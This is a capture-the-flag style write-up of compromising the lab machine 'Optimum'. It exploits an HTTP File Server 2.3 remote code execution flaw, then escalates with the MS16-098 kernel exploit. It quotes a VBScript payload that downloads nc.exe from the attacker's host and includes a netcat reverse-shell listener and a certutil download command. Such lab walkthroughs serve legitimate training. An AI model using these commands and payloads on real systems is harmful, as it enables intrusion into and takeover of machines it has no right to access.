This is a relative easy machine, as seen from the matrix the attacks are more related to CVE.
nmap -A -p- -T4 -oN optimum -vvv 10.10.10.8
Http File Server 2.3
As shown in the web browser, the web service is hosted by http file server which is a program for windows to server files via http web service, this is easy to use and setup without too much effort on the user’s end.
httpfileserver 2.3 exploit
A search from the web reveals that httpfileserver 2.3 has a remote code execution exploit written in python.
Reading the exploit code, it is obvious that the python is creating a vb script with the following source code:
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") dim bStrm: Set bStrm = createobject("Adodb.Stream") xHttp.Open "GET", "http://"+ip_addr+"/nc.exe", False xHttp.Send with bStrm .type = 1 '//binary .open .write xHttp.responseBody .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite end with
The exploit code downloads nc.exe from the attacker’s machine then save it as nc.exe in C:\Users\Public. Then execute the script to trigger nc.exe to do a reverse tcp and create a cmd shell, the vulnerability of HFS 2.3 lies on its variable –
Get the user flag
I need to turn on a web server that hosts the nc.exe then on another terminal I need to create a nc server to listen on.
On the exploit code I change the ip address to my own tunnel ip address so that the exploit will do a connection back to my nc server.
python3 -m http.server 80
This command has to be executed in the directory that has the nc.exe.
then start my nc server
sudo nc -lvnp 443
Modify the ip address within the exploit code, then run it.
python 39161.py 10.10.10.8 80
The user flag is
Get the root
systeminfo the machine is running Windows 2012 R2 standard edition build 9600, there are a few kernel exploits which are usable, I chose the kernel driver exploit MS16-098, this exploit though is related to Windows 8.1 works perfectly on Windows 2012 server as well.
I download the compiled binary
bfill.exe then serve a web server for me to download from Optimum.
On the Optimum machine I do
certutil -f -urlcache http://10.10.14.27/bfill.exe c:\users\kostas\downloads\bfill.exe
The run the exploit to get root.
the root flag is